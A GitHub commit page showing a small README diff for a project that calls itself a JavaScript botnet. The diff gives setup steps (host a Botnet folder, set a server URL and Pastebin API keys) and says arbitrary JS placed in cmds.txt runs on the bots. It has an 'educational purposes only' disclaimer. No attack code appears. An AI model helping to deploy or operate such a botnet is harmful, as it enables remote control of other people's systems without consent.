Skip to content

Commit a6461d5

Browse files
authored
Update README.md
1 parent 9df385f commit a6461d5

1 file changed

Lines changed: 3 additions & 3 deletions

File tree

README.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -6,8 +6,8 @@ A simple and easy to use JS Botnet
66
2) Upload the "Botnet" folder to your webserver
77
3) Edit "bot.js"
88
+ Change the "SERVER_URL" variable to your website's url
9-
+ Edit "bot.js" (Change the "api_dev_key" varibable)
10-
+ Edit "bot.js" (Change the "api_user_key" variable)
9+
+ Edit "bot.js" (Change the "api_dev_key" varibable to match your pastebin's account key)
10+
+ Edit "bot.js" (Change the "api_user_key" variable to match your pastebin's account key)
1111
4) Done
1212

1313
# How to use
@@ -57,4 +57,4 @@ You can put any JS code in the "cmds.txt" file and it will be executed [i.e. "al
5757
# DISCLAMER
5858
+ This is for educational purposes ONLY
5959
+ I or anyone else who works on this project can't and won't be held responsible for anything YOU do with this
60-
+ Please use responsibly
60+
+ Please use responsibly

0 commit comments

Comments
 (0)